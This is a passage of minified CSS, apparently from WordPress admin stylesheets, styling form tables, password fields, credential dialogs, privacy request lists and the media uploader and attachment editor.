input{font-family:Consolas,Monaco,monospace}#pass1-text.short,#pass1.short{border-color:#e65054}#pass1-text.bad,#pass1.bad{border-color:#f86368}#pass1-text.good,#pass1.good{border-color:#f0c33c}#pass1-text.strong,#pass1.strong{border-color:#68de7c}#pass1-text:focus,#pass1:focus{box-shadow:0 0 0 .5px var(--wp-admin-theme-color);outline:2px solid transparent}.pw-weak{display:none}.indicator-hint{padding-top:8px}.wp-pwd [type=password],.wp-pwd [type=text]{margin-bottom:0;min-height:40px}.wp-pwd input::-ms-reveal{display:none}#pass1-text,.show-password #pass1{display:none}#pass1-text::-ms-clear{display:none}.show-password #pass1-text{display:inline-block}.wp-pwd .caps-warning{display:none;position:relative;background:#fcf9e8;border:1px solid #f0c33c;color:#1d2327;padding:6px 10px;top:-8px}.profile-php .wp-pwd .caps-warning{padding:3px 5px;top:-4px;border-radius:2px}.wp-pwd .caps-icon{display:inline-flex;justify-content:center;width:20px;height:20px;margin-right:5px;vertical-align:middle}.wp-pwd .caps-warning-text{vertical-align:middle}p.search-box{display:flex;flex-wrap:wrap;align-items:center;column-gap:.5rem;position:relative;float:right;margin:11px 0}p.search-box input[type=search],p.search-box input[type=text]{min-height:32px;padding:0 8px}p.search-box .button{min-height:32px;line-height:2.30769231;padding:0 12px}.network-admin.themes-php p.search-box{clear:left}.tablenav .search-plugins input[name="s"]{float:left;margin:0 4px 0 0}.tagsdiv .newtag{margin:0}.js.plugins-php .search-box .wp-filter-search{margin:0;width:280px}input[type=email].ui-autocomplete-loading,input[type=text].ui-autocomplete-loading{background-image:url(../images/loading.gif);background-repeat:no-repeat;background-position:right 5px center;visibility:visible}input.ui-autocomplete-input.open{border-bottom-color:transparent}ul#add-to-blog-users{margin:0 0 0 14px}.ui-autocomplete{padding:0;margin:0;list-style:none;position:absolute;z-index:10000;border:1px solid #4f94d4;box-shadow:0 1px 2px rgba(79,148,212,.8);background-color:#fff}.ui-autocomplete li{margin-bottom:0;padding:4px 10px;white-space:nowrap;text-align:left;cursor:pointer}.ui-autocomplete .ui-state-focus{background-color:#dcdcde}.wp-tags-autocomplete .ui-state-focus,.wp-tags-autocomplete [aria-selected=true]{background-color:var(--wp-admin-theme-color);color:#fff;outline:2px solid transparent}.form-table{border-collapse:collapse;margin-top:.5em;width:100%;clear:both}.form-table,.form-table td,.form-table td p,.form-table th{font-size:14px}.form-table td{margin-bottom:9px;padding:15px 10px;line-height:1.3;vertical-align:middle}.form-table th,.form-wrap label{color:#1d2327;font-weight:400;text-shadow:none;vertical-align:baseline}.form-table th{vertical-align:top;text-align:left;padding:20px 10px 20px 0;width:200px;line-height:1.3;font-weight:600}.form-table .td-full,.form-table th.th-full{width:auto;padding:20px 10px 20px 0;font-weight:400}.form-table td p{margin-top:4px;margin-bottom:0}.form-table .date-time-doc{margin-top:1em}.form-table p.timezone-info{margin:1em 0;display:flex;flex-direction:column}#local-time{margin-top:.5em}.form-table td fieldset label{margin:.35em 0 .5em!important;display:inline-block}.form-table td fieldset p label{margin-top:0!important}.form-table td fieldset label,.form-table td fieldset li,.form-table td fieldset p{line-height:1.4}.form-table .pre{padding:8px;margin:0}table.form-table td .updated{font-size:13px}table.form-table td .updated p{font-size:13px;margin:.3em 0}#profile-page .form-table textarea{width:500px;margin-bottom:6px}#profile-page .form-table #rich_editing{margin-right:5px}#your-profile legend{font-size:22px}#display_name{width:15em}#adduser .form-field input,#createuser .form-field input{width:25em}.color-option{display:inline-block;width:24%;padding:5px 15px 15px;box-sizing:border-box;margin-bottom:3px}.color-option.selected,.color-option:hover{background:#dcdcde}.color-palette{display:table;width:100%;border-spacing:0;border-collapse:collapse}.color-palette .color-palette-shade,.color-palette td{display:table-cell;height:20px;padding:0;border:none}.color-option{cursor:pointer}.create-application-password .form-field{max-width:25em}.create-application-password label{font-weight:600}.create-application-password p.submit{margin-bottom:0;padding-bottom:0;display:block}#application-passwords-section .notice{margin-top:20px;margin-bottom:0;word-wrap:break-word}.application-password-display input.code{margin-bottom:6px;width:100%;max-width:20em}.auth-app-card.card{max-width:768px}.authorize-application-php .form-wrap p{display:block}.tool-box .title{margin:8px 0;font-size:18px;font-weight:400;line-height:24px}.label-responsive{vertical-align:middle}#export-filters p{margin:0 0 1em}#export-filters p.submit{margin:7px 0 5px}.card{position:relative;margin-top:20px;padding:16px 24px;min-width:255px;max-width:520px;border:1px solid rgb(0,0,0,.1);border-radius:8px;background:#fff;box-sizing:border-box}.pressthis h4{margin:2em 0 1em}.pressthis textarea{width:100%;font-size:1em}#pressthis-code-wrap{overflow:auto}.pressthis-bookmarklet-wrapper{margin:20px 0 8px;vertical-align:top;position:relative;z-index:1}.pressthis-bookmarklet,.pressthis-bookmarklet:active,.pressthis-bookmarklet:focus,.pressthis-bookmarklet:hover{display:inline-block;position:relative;cursor:move;color:#2c3338;background:#dcdcde;border-radius:5px;border:1px solid #c3c4c7;font-style:normal;line-height:16px;font-size:14px;text-decoration:none}.pressthis-bookmarklet:active{outline:0}.pressthis-bookmarklet:after{content:"";width:70%;height:55%;z-index:-1;position:absolute;right:10px;bottom:9px;background:0 0;transform:skew(20deg) rotate(6deg);box-shadow:0 10px 8px rgba(0,0,0,.6)}.pressthis-bookmarklet:hover:after{transform:skew(20deg) rotate(9deg);box-shadow:0 10px 8px rgba(0,0,0,.7)}.pressthis-bookmarklet span{display:inline-block;margin:0;padding:0 12px 8px 9px}.pressthis-bookmarklet span:before{color:#787c82;font:normal 20px/1 dashicons;content:"\f157";content:"\f157"/'';position:relative;display:inline-block;top:4px;margin-right:4px}.pressthis-js-toggle{margin-left:10px;padding:0;height:auto;vertical-align:top}.pressthis-js-toggle.button.button{margin-left:10px;padding:0;height:auto;vertical-align:top}.pressthis-js-toggle .dashicons{margin:5px 8px 6px 7px;color:#50575e}.timezone-info code{white-space:nowrap}.defaultavatarpicker .avatar{margin:2px 0;vertical-align:middle}.options-general-php .date-time-text{display:inline-block;min-width:10em}.options-general-php input.small-text{width:56px;margin:-2px 0;min-height:32px}.options-general-php .spinner{float:none;margin:-3px 3px 0}.options-general-php .language-install-spinner,.profile-php .language-install-spinner,.settings-php .language-install-spinner,.user-edit-php .language-install-spinner{display:inline-block;float:none;margin:-3px 5px 0;vertical-align:middle}.form-table.permalink-structure .available-structure-tags{margin-top:8px}.form-table.permalink-structure .available-structure-tags ul{display:flex;flex-wrap:wrap;margin:8px 0 0}.form-table.permalink-structure .available-structure-tags li{margin:6px 5px 0 0}.form-table.permalink-structure .available-structure-tags li:last-child{margin-right:0}.form-table.permalink-structure .structure-selection .row{margin-bottom:16px}.form-table.permalink-structure .structure-selection .row>div{max-width:calc(100% - 24px);display:inline-flex;flex-direction:column}.form-table.permalink-structure .structure-selection .row label{font-weight:600}.form-table.permalink-structure .structure-selection .row p{margin-top:0}.permalink-structure-optional-description code{display:inline-block}.setup-php textarea{max-width:100%}.form-field #site-address{max-width:25em}.form-field #domain{max-width:22em}.form-field #admin-email,.form-field #blog_last_updated,.form-field #blog_registered,.form-field #path,.form-field #site-title{max-width:25em}.form-field #path{margin-bottom:5px}#search-sites,#search-users{max-width:60%}.configuration-rules-label{font-weight:600;margin-bottom:4px}.request-filesystem-credentials-dialog{display:none;visibility:visible}.request-filesystem-credentials-dialog .notification-dialog{top:10%;max-height:85%}.request-filesystem-credentials-dialog-content{margin:25px}#request-filesystem-credentials-title{font-size:1.3em;margin:1em 0}.request-filesystem-credentials-form legend{font-size:1em;padding:1.33em 0;font-weight:600}.request-filesystem-credentials-form input[type=password],.request-filesystem-credentials-form input[type=text]{display:block}.request-filesystem-credentials-dialog input[type=password],.request-filesystem-credentials-dialog input[type=text]{width:100%}.request-filesystem-credentials-form .field-title{font-weight:600}.request-filesystem-credentials-dialog label[for=hostname],.request-filesystem-credentials-dialog label[for=private_key],.request-filesystem-credentials-dialog label[for=public_key]{display:block;margin-bottom:1em}.request-filesystem-credentials-dialog .ftp-password,.request-filesystem-credentials-dialog .ftp-username{float:left;width:48%}.request-filesystem-credentials-dialog .ftp-password{margin-left:4%}.request-filesystem-credentials-dialog .request-filesystem-credentials-action-buttons{text-align:right}.request-filesystem-credentials-dialog label[for=ftp]{margin-right:10px}.request-filesystem-credentials-dialog #auth-keys-desc{margin-bottom:0}#request-filesystem-credentials-dialog .button:not(:last-child){margin-right:10px}#request-filesystem-credentials-form .cancel-button{display:none}#request-filesystem-credentials-dialog .cancel-button{display:inline}.request-filesystem-credentials-dialog .ftp-password,.request-filesystem-credentials-dialog .ftp-username{float:none;width:auto}.request-filesystem-credentials-dialog .ftp-username{margin-bottom:1em}.request-filesystem-credentials-dialog .ftp-password{margin:0}.request-filesystem-credentials-dialog .ftp-password em{color:#757575}.request-filesystem-credentials-dialog label{display:block;line-height:1.5;margin-bottom:1em}.request-filesystem-credentials-form legend{padding-bottom:0}.request-filesystem-credentials-form #ssh-keys legend{font-size:1.3em}.request-filesystem-credentials-form .notice{margin:0 0 20px;clear:both}.tools-privacy-policy-page form{margin-bottom:1.3em}.tools-privacy-policy-page input.button{margin:0 1px 0 6px}.tools-privacy-policy-page select{margin:0 1px .5em 6px}.tools-privacy-edit{margin:1.5em 0}.tools-privacy-policy-page span{line-height:2}.privacy_requests .column-email{width:40%}.privacy_requests .column-type{text-align:center}.privacy_requests tfoot td:first-child,.privacy_requests thead td:first-child{border-left:4px solid #fff}.privacy_requests tbody th{border-left:4px solid #fff;background:#fff;box-shadow:inset 0 -1px 0 rgba(0,0,0,.1)}.privacy_requests .row-actions{color:#787c82}.privacy_requests .row-actions.processing{position:static}.privacy_requests tbody .has-request-results th{box-shadow:none}.privacy_requests tbody .request-results th .notice{margin:0 0 5px}.privacy_requests tbody td{background:#fff;box-shadow:inset 0 -1px 0 rgba(0,0,0,.1)}.privacy_requests tbody .has-request-results td{box-shadow:none}.privacy_requests .next_steps .button{word-wrap:break-word;white-space:normal}.privacy_requests .status-request-confirmed td,.privacy_requests .status-request-confirmed th{background-color:#fff;border-left-color:#72aee6}.privacy_requests .status-request-failed td,.privacy_requests .status-request-failed th{background-color:#f6f7f7;border-left-color:#d63638}.privacy_requests .export_personal_data_failed a{vertical-align:baseline}.status-label{font-weight:600}.status-label.status-request-pending{font-weight:400;font-style:italic;color:#646970}.status-label.status-request-failed{color:#d63638;font-weight:600}.privacy_requests .status-date{display:block;font-weight:400}.wp-privacy-request-form{clear:both}.wp-privacy-request-form-field{margin:1.5em 0}.wp-privacy-request-form input{margin:0}@media screen and (max-width:782px){textarea{-webkit-appearance:none}input[type=date],input[type=datetime-local],input[type=datetime],input[type=email],input[type=month],input[type=number],input[type=password],input[type=search],input[type=tel],input[type=text],input[type=time],input[type=url],input[type=week]{-webkit-appearance:none;padding:0 12px;min-height:40px}::-webkit-datetime-edit{line-height:1.875}.widefat tfoot td input[type=checkbox],.widefat th input[type=checkbox],.widefat thead td input[type=checkbox],input[type=checkbox]{-webkit-appearance:none}.widefat tfoot td input[type=checkbox],.widefat th input[type=checkbox],.widefat thead td input[type=checkbox]{margin-bottom:8px}.widefat tfoot td input[type=checkbox]:before,.widefat th input[type=checkbox]:before,.widefat thead td input[type=checkbox]:before,input[type=checkbox]:checked:before{width:1.875rem;height:1.875rem;margin:-.1875rem -.3125rem}input[type=checkbox],input[type=radio]{height:1.5625rem;width:1.5625rem}.wp-admin p input[type=checkbox],.wp-admin p input[type=radio]{margin-top:-.1875rem}input[type=radio]:checked:before{vertical-align:middle;width:.5625rem;height:.5625rem;margin:.4375rem;line-height:.76190476}.wp-admin .form-table select,.wp-core-ui select{min-height:40px;font-size:16px;line-height:2.5;padding:0 24px 0 12px}.wp-admin .button-cancel{margin-bottom:0;padding:2px 0;font-size:14px;vertical-align:middle}#adduser .form-field input,#createuser .form-field input{width:100%}.form-table{box-sizing:border-box}.form-table td,.form-table th,.label-responsive{display:block;width:auto;vertical-align:middle}.label-responsive{margin:.5em 0}.export-filters li{margin-bottom:0}.form-table .color-palette .color-palette-shade,.form-table .color-palette td{display:table-cell;width:15px;height:30px;padding:0}.form-table .color-palette{margin-right:10px}input,textarea{font-size:16px}#profile-page .form-table textarea,.form-table span.description,.form-table td input[type=email],.form-table td input[type=password],.form-table td input[type=text],.form-table td select,.form-table td textarea{width:100%;display:block;max-width:none;box-sizing:border-box}.form-table .form-required.form-invalid td:after{float:right;margin:-30px 3px 0 0}.form-table input[type=text].small-text,input[type=number].small-text,input[type=password].small-text,input[type=search].small-text,input[type=text].small-text{width:auto;max-width:4.375em;display:inline;padding:3px 6px;margin:0 3px}.form-table .regular-text~input[type=text].small-text{margin-top:5px}#pass-strength-result{width:100%;box-sizing:border-box;padding:8px}.profile-php .wp-pwd .caps-warning{padding:8px}.password-input-wrapper{display:block}.wp-core-ui .tablenav input[type=date],.wp-core-ui .tablenav input[type=datetime-local],.wp-core-ui .tablenav input[type=datetime],.wp-core-ui .tablenav input[type=email],.wp-core-ui .tablenav input[type=month],.wp-core-ui .tablenav input[type=number],.wp-core-ui .tablenav input[type=password],.wp-core-ui .tablenav input[type=search],.wp-core-ui .tablenav input[type=tel],.wp-core-ui .tablenav input[type=text],.wp-core-ui .tablenav input[type=time],.wp-core-ui .tablenav input[type=url],.wp-core-ui .tablenav input[type=week],.wp-core-ui .tablenav select{min-height:40px}.wp-core-ui .tablenav .button{min-height:40px;line-height:2.71428571;padding:0 14px}p.search-box{float:none;width:100%;margin-bottom:20px;display:flex}p.search-box input[name="s"]{width:100%;float:none;margin-bottom:10px;vertical-align:middle}.js.plugins-php .search-box .wp-filter-search{width:100%;margin-bottom:0}p.search-box input[type=search],p.search-box input[type=text]{min-height:40px;padding:0 12px}p.search-box input[type=submit].button{margin-bottom:10px}.form-table span.description{display:inline;padding:4px 0 0;line-height:1.4;font-size:14px}.form-table th{padding:10px 0 0;border-bottom:0}.form-table td{margin-bottom:0;padding:4px 0 6px}.form-table.permalink-structure td code{display:inline-block}.form-table.permalink-structure .structure-selection{margin-top:8px}.form-table.permalink-structure .structure-selection .row>div{max-width:calc(100% - 36px);width:100%}.form-table.permalink-structure td input[type=text]{margin-top:4px}.permalink-structure-has-blog-prefix{display:flex;align-items:center}.form-table input.regular-text{width:100%}.form-table label{font-size:14px}.form-table td>label:first-child{display:inline-block;margin-top:.35em}.background-position-control .button-group>label{font-size:0}.form-table fieldset label{display:block}.form-field #domain{max-width:none}.wp-pwd{position:relative}#profile-page .form-table #pass1{padding-right:90px}.wp-pwd button.button{background:0 0;border:1px solid transparent;box-shadow:none;line-height:2;margin:0;padding:5px 9px;position:absolute;right:0;top:0;width:2.375rem;height:2.375rem;min-width:40px;min-height:40px}.wp-pwd button.wp-hide-pw{right:2.5rem}body.user-new-php .wp-pwd button.wp-hide-pw{right:0}.wp-pwd button.button:focus,.wp-pwd button.button:hover{background:0 0}.wp-pwd button.button:active{background:0 0;box-shadow:none;transform:none}.wp-pwd .button .text{display:none}.wp-pwd [type=password],.wp-pwd [type=text]{line-height:2;padding-right:5rem}body.user-new-php .wp-pwd [type=password],body.user-new-php .wp-pwd [type=text]{padding-right:2.5rem}.wp-cancel-pw .dashicons-no{display:inline-block}.mailserver-pass-wrap .wp-pwd{display:block}#mailserver_pass{padding-left:10px}.options-general-php input[type=text].small-text{max-width:6.25em;margin:0;min-height:40px}.tools-privacy-policy-page form.wp-create-privacy-page{margin-bottom:1em}.tools-privacy-policy-page input#set-page,.tools-privacy-policy-page select{margin:10px 0 0}.tools-privacy-policy-page .wp-create-privacy-page span{display:block;margin-bottom:1em}.tools-privacy-policy-page .wp-create-privacy-page .button{margin-left:0}.wp-list-table.privacy_requests tr:not(.inline-edit-row):not(.no-items) td.column-primary:not(.check-column){display:table-cell}.wp-list-table.privacy_requests.widefat th input,.wp-list-table.privacy_requests.widefat thead td input{margin-left:5px}.wp-privacy-request-form-field input[type=text]{width:100%;margin-bottom:10px;vertical-align:middle}.regular-text{max-width:100%}}@media only screen and (max-width:768px){.form-field input[type=email],.form-field input[type=password],.form-field input[type=text],.form-field select,.form-field textarea{width:99%}.form-wrap .form-field{padding:0}}@media only screen and (max-height:480px),screen and (max-width:450px){.file-editor-warning .notification-dialog,.request-filesystem-credentials-dialog .notification-dialog{width:100%;height:100%;max-height:100%;position:fixed;top:0;margin:0;left:0}}@media screen and (max-width:600px){.color-option{width:49%}}@media only screen and (max-width:320px){.options-general-php .date-time-text.date-time-custom-text{min-width:0;margin-right:.5em}}@keyframes rotation{0%{transform:rotate(0)}100%{transform:rotate(359deg)}}/*! This file is auto-generated */ .media-item .describe{border-collapse:collapse;width:100%;border-top:1px solid #dcdcde;clear:both;cursor:default}.media-item.media-blank .describe{border:0}.media-item .describe th{vertical-align:top;text-align:right;padding:5px 10px 10px;width:140px}.media-item .describe .align th{padding-top:0}.media-item .media-item-info tr{background-color:transparent}.media-item .describe td{padding:0 0 8px 8px;vertical-align:top}.media-item thead.media-item-info td{padding:4px 10px 0}.media-item .media-item-info .A1B1{padding:0 10px 0 0}.media-item td.savesend{padding-bottom:15px}.media-item .thumbnail{max-height:128px;max-width:128px}.media-list-subtitle{display:block}.media-list-title{display:block}#wpbody-content #async-upload-wrap a{display:none}.media-upload-form{margin-top:20px}.media-upload-form td label{margin-left:6px;margin-right:2px}.media-upload-form .align .field label{display:inline;padding:0 23px 0 0;margin:0 3px 0 1em;font-weight:600}.media-upload-form tr.image-size label{margin:0 5px 0 0;font-weight:600}.media-upload-form th.label label{font-weight:600;margin:.5em;font-size:13px}.media-upload-form th.label label span{padding:0 5px}.media-item .describe input[type=text],.media-item .describe textarea{width:460px}.media-item .describe p.help{margin:0;padding:0 5px 0 0}.describe-toggle-off,.describe-toggle-on{display:block;line-height:2.76923076;float:left;margin-left:10px}.media-item .attachment-tools{display:flex;align-items:center}.media-item .edit-attachment{padding:14px 0;display:block;margin-left:10px}.media-item .edit-attachment.copy-to-clipboard-container{display:flex;margin-top:0}.media-item-copy-container .success{line-height:0}.media-item button .copy-attachment-url{margin-top:14px}.media-item .copy-to-clipboard-container{margin-top:7px}.media-item .describe-toggle-off,.media-item.open .describe-toggle-on{display:none}.media-item.open .describe-toggle-off{display:block}.media-upload-form .media-item{min-height:70px;margin-bottom:1px;position:relative;width:100%;background:#fff}.media-upload-form .media-item,.media-upload-form .media-item .error{box-shadow:0 1px 0 #dcdcde}#media-items:empty{border:0 none}.media-item .filename{padding:14px 2px;overflow:hidden;margin-right:4px}.media-item .pinkynail{float:right;margin:14px;max-height:70px;max-width:70px}.media-item .startclosed,.media-item .startopen{display:none}.media-item .progress{display:inline-block;height:22px;margin:0 6px 7px;width:200px;line-height:2em;padding:0;overflow:hidden;border-radius:22px;background:#dcdcde;box-shadow:inset 0 1px 2px rgba(0,0,0,.1)}.media-item .bar{z-index:9;width:0;height:100%;margin-top:-22px;border-radius:22px;background-color:#2271b1;box-shadow:inset 0 0 2px rgba(0,0,0,.3)}.media-item .progress .percent{z-index:10;position:relative;width:200px;padding:0;color:#fff;text-align:center;line-height:22px;font-weight:400;text-shadow:0 1px 2px rgba(0,0,0,.2)}.upload-php .fixed .column-parent{width:15%}.js .html-uploader #plupload-upload-ui{display:none}.js .html-uploader #html-upload-ui{display:block}#html-upload-ui #async-upload{font-size:1em}.media-upload-form .media-item .error,.media-upload-form .media-item.error{width:auto;margin:0 0 1px}.media-upload-form .media-item .error{padding:10px 14px 10px 0;min-height:50px}.media-item .error-div button.dismiss{float:left;margin:0 15px 0 10px}.find-box{background-color:#fff;box-shadow:0 3px 6px rgba(0,0,0,.3);width:600px;overflow:hidden;margin-right:-300px;position:fixed;top:30px;bottom:30px;right:50%;z-index:100105}.find-box-head{background:#fff;border-bottom:1px solid #dcdcde;height:36px;font-size:18px;font-weight:600;line-height:2;padding:0 16px 0 36px;position:absolute;top:0;right:0;left:0}.find-box-inside{overflow:auto;padding:16px;background-color:#fff;position:absolute;top:37px;bottom:45px;overflow-y:scroll;width:100%;box-sizing:border-box}.find-box-search{padding-bottom:16px}.find-box-search .spinner{float:none;right:105px;position:absolute}#find-posts-response,.find-box-search{position:relative}#find-posts-input,#find-posts-search{float:right}#find-posts-input{width:140px;height:28px;margin:0 0 0 4px}.widefat .found-radio{padding-left:0;width:16px}#find-posts-close{width:36px;height:36px;border:none;padding:0;position:absolute;top:0;left:0;cursor:pointer;text-align:center;background:0 0;color:#646970}#find-posts-close:focus,#find-posts-close:hover{color:var(--wp-admin-theme-color-darker-20,#183ad6)}#find-posts-close:focus{box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9);outline:2px solid transparent;outline-offset:-2px}#find-posts-close:before{font:normal 20px/36px dashicons;vertical-align:top;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;content:"\f158";content:"\f158"/''}.find-box-buttons{padding:8px 16px;background:#fff;border-top:1px solid #dcdcde;position:absolute;bottom:0;right:0;left:0}@media screen and (max-width:782px){.find-box-inside{bottom:57px}#delete_all{margin-bottom:0}}@media screen and (max-width:660px){.find-box{top:0;bottom:0;right:0;left:0;margin:0;width:100%}}.ui-find-overlay{position:fixed;top:0;right:0;left:0;bottom:0;background:#000;opacity:.7;z-index:100100}.drag-drop #drag-drop-area{border:4px dashed #c3c4c7;height:200px}.drag-drop .drag-drop-inside{margin:60px auto 0;width:250px}.drag-drop-inside p{font-size:14px;margin:5px 0;display:none}.drag-drop .drag-drop-inside p{text-align:center}.drag-drop-inside p.drag-drop-info{font-size:20px}.drag-drop .drag-drop-inside p,.drag-drop-inside p.drag-drop-buttons{display:block}.drag-drop.drag-over #drag-drop-area{border-color:#9ec2e6}#plupload-upload-ui{position:relative}.post-type-attachment .wp-filter select{margin:0 0 0 6px}.media-frame.mode-grid,.media-frame.mode-grid .attachments-browser.has-load-more .attachments-wrapper,.media-frame.mode-grid .attachments-browser:not(.has-load-more) .attachments,.media-frame.mode-grid .media-frame-content,.media-frame.mode-grid .uploader-inline-content{position:static}.media-frame.mode-grid .media-frame-menu,.media-frame.mode-grid .media-frame-router,.media-frame.mode-grid .media-frame-title{display:none}.media-frame.mode-grid .media-frame-content{background-color:transparent;border:none}.upload-php .mode-grid .media-sidebar{position:relative;width:auto;margin-top:12px;padding:0 16px;border-right:4px solid #d63638;box-shadow:0 1px 1px 0 rgba(0,0,0,.1);background-color:#fff}.upload-php .mode-grid .hide-sidebar .media-sidebar{display:none}.upload-php .mode-grid .media-sidebar .media-uploader-status{border-bottom:none;padding-bottom:0;max-width:100%}.upload-php .mode-grid .media-sidebar .upload-error{margin:12px 0;padding:4px 0 0;border:none;box-shadow:none;background:0 0}.upload-php .mode-grid .media-sidebar .media-uploader-status.errors h2{display:none}.media-frame.mode-grid .uploader-inline{position:relative;top:auto;left:auto;right:auto;bottom:auto;padding-top:0;margin-top:20px;border:4px dashed #c3c4c7}.media-frame.mode-select .attachments-browser.fixed:not(.has-load-more) .attachments,.media-frame.mode-select .attachments-browser.has-load-more.fixed .attachments-wrapper{position:relative;top:94px;padding-bottom:94px}.media-frame.mode-grid .attachment.details:focus,.media-frame.mode-grid .attachment:focus,.media-frame.mode-grid .selected.attachment:focus{box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9);outline:2px solid transparent;outline-offset:-6px}.media-frame.mode-grid .selected.attachment{box-shadow:inset 0 0 0 5px #f0f0f1,inset 0 0 0 7px #c3c4c7}.media-frame.mode-grid .attachment.details{box-shadow:inset 0 0 0 3px #f0f0f1,inset 0 0 0 7px var(--wp-admin-theme-color,#3858e9)}.media-frame.mode-grid.mode-select .attachment .thumbnail{opacity:.65}.media-frame.mode-select .attachment.selected .thumbnail{opacity:1}.media-frame.mode-grid .media-toolbar{margin-bottom:15px;height:auto}.media-frame.mode-grid .media-toolbar label:not(.media-search-input-label){border:0;clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-wrap:normal!important;word-break:normal!important}.media-frame.mode-grid .media-toolbar select{margin:0 0 0 10px;min-height:32px;line-height:2.14285714;padding:0 8px 0 24px}.media-frame.mode-grid .media-toolbar input[type=search]{min-height:32px;padding:0 8px}.media-frame.mode-grid .media-toolbar-secondary{display:flex;flex-wrap:wrap;align-items:center;gap:8px}.media-frame.mode-grid.mode-edit .media-toolbar-secondary>.select-mode-toggle-button{margin:0 0 0 8px;height:100%}.media-frame.mode-grid .attachments-browser .bulk-select{display:inline-block;margin:0 0 0 10px}.media-frame.mode-grid .search{margin-top:0}.media-frame-content .media-search-input-label{vertical-align:baseline}.attachments-browser .media-toolbar-secondary>.media-button{margin-left:10px}.media-frame.mode-select .attachments-browser.fixed .media-toolbar{position:fixed;top:32px;right:auto;left:20px;margin-top:0}.media-frame.mode-grid .attachments-browser{padding:0}.media-frame.mode-grid .attachments-browser .attachments{padding:2px}.media-frame.mode-grid .attachments-browser .no-media{color:#646970;font-size:18px;font-style:normal;margin:0;padding:100px 0 0;text-align:center}.edit-attachment-frame{display:block;height:100%;width:100%}.edit-attachment-frame .edit-media-header{overflow:hidden}.upload-php .media-modal-close .media-modal-icon:before{content:"\f335";content:"\f335"/'';font-size:22px}.edit-attachment-frame .edit-media-header .left,.edit-attachment-frame .edit-media-header .right,.upload-php .media-modal-close{cursor:pointer;color:#787c82;background-color:transparent;height:50px;width:50px;padding:0;position:absolute;text-align:center;border:0;border-right:1px solid #dcdcde;transition:color .1s ease-in-out,background .1s ease-in-out}.upload-php .media-modal-close{top:0;left:0}.edit-attachment-frame .edit-media-header .left{left:102px}.edit-attachment-frame .edit-media-header .right{left:51px}.edit-attachment-frame .media-frame-title{right:0;left:150px}.edit-attachment-frame .edit-media-header .left:before,.edit-attachment-frame .edit-media-header .right:before{font:normal 20px/50px dashicons!important;display:inline;font-weight:300}.edit-attachment-frame .edit-media-header .left:focus,.edit-attachment-frame .edit-media-header .left:hover,.edit-attachment-frame .edit-media-header .right:focus,.edit-attachment-frame .edit-media-header .right:hover,.upload-php .media-modal-close:focus,.upload-php .media-modal-close:hover{background:#dcdcde;border-color:#c3c4c7;color:#000;outline:0;box-shadow:none}.edit-attachment-frame .edit-media-header .left:focus,.edit-attachment-frame .edit-media-header .right:focus,.upload-php .media-modal-close:focus{outline:2px solid transparent;outline-offset:-2px}.upload-php .media-modal-close:focus .media-modal-icon:before,.upload-php .media-modal-close:hover .media-modal-icon:before{color:#000}.edit-attachment-frame .edit-media-header .left:before{content:"\f345";content:"\f341"/''}.edit-attachment-frame .edit-media-header .right:before{content:"\f341";content:"\f345"/''}.edit-attachment-frame .edit-media-header [disabled],.edit-attachment-frame .edit-media-header [disabled]:hover{color:#c3c4c7;background:inherit;cursor:default}.edit-attachment-frame .media-frame-content,.edit-attachment-frame .media-frame-router{right:0}.edit-attachment-frame .media-frame-content{border-bottom:none;bottom:0;top:50px}.edit-attachment-frame .attachment-details{position:absolute;overflow:auto;top:0;bottom:0;left:0;right:0;box-shadow:inset 0 4px 4px -4px rgba(0,0,0,.1)}.edit-attachment-frame .attachment-media-view{float:right;width:65%;height:100%}.edit-attachment-frame .attachment-media-view .thumbnail{box-sizing:border-box;padding:16px;height:100%}.edit-attachment-frame .attachment-media-view .details-image{display:block;margin:0 auto 16px;max-width:100%;max-height:90%;max-height:calc(100% - 56px);background-image:linear-gradient(-45deg,#c3c4c7 25%,transparent 25%,transparent 75%,#c3c4c7 75%,#c3c4c7),linear-gradient(-45deg,#c3c4c7 25%,transparent 25%,transparent 75%,#c3c4c7 75%,#c3c4c7);background-position:100% 0,10px 10px;background-size:20px 20px}.edit-attachment-frame .attachment-media-view .details-image.icon{background:0 0}.edit-attachment-frame .attachment-media-view .attachment-actions{text-align:center}.edit-attachment-frame .wp-media-wrapper{margin-bottom:12px}.edit-attachment-frame input,.edit-attachment-frame textarea{padding:4px 8px;line-height:1.42857143}.edit-attachment-frame .attachment-info{overflow:auto;box-sizing:border-box;margin-bottom:0;padding:12px 16px 0;width:35%;height:100%;box-shadow:inset 0 4px 4px -4px rgba(0,0,0,.1);border-bottom:0;border-right:1px solid #dcdcde;background:#f6f7f7}.edit-attachment-frame .attachment-info .details,.edit-attachment-frame .attachment-info .settings{position:relative;overflow:hidden;float:none;margin-bottom:15px;padding-bottom:15px;border-bottom:1px solid #dcdcde}.edit-attachment-frame .attachment-info .filename{font-weight:400;color:#646970}.edit-attachment-frame .attachment-info .thumbnail{margin-bottom:12px}.attachment-info .actions{margin-bottom:16px}.attachment-info .actions a{display:inline;text-decoration:none}.copy-to-clipboard-container{display:flex;align-items:center;margin-top:8px;clear:both}.copy-to-clipboard-container .copy-attachment-url{white-space:normal}.copy-to-clipboard-container .success{color:#007017;margin-right:8px}.wp_attachment_details .attachment-alt-text{margin-bottom:5px}.wp_attachment_details #attachment_alt{max-width:500px;height:3.28571428em}.wp_attachment_details .attachment-alt-text-description{margin-top:5px}.wp_attachment_details label[for=content]{font-size:13px;line-height:1.5;margin:1em 0}.wp_attachment_details #attachment_caption{height:4em}.describe .image-editor{vertical-align:top}.imgedit-wrap{position:relative;padding-top:10px}.image-editor fieldset,.image-editor p{margin:8px 0}.image-editor legend{margin-bottom:5px}.describe .imgedit-wrap .image-editor{padding:0 5px}.wp_attachment_holder div.updated{margin-top:0}.wp_attachment_holder .imgedit-wrap>div{height:auto}.imgedit-panel-content{display:flex;flex-wrap:wrap;gap:20px;margin-bottom:20px}.imgedit-settings{max-width:240px}.imgedit-group-controls>*{display:none}.imgedit-panel-active .imgedit-group-controls>*{display:block}.imgedit-panel-active .imgedit-group-controls>.imgedit-crop-apply{display:flex}.imgedit-crop-apply{gap:4px;flex-wrap:wrap}.wp_attachment_holder .imgedit-wrap .image-editor{float:left;width:250px}.image-editor 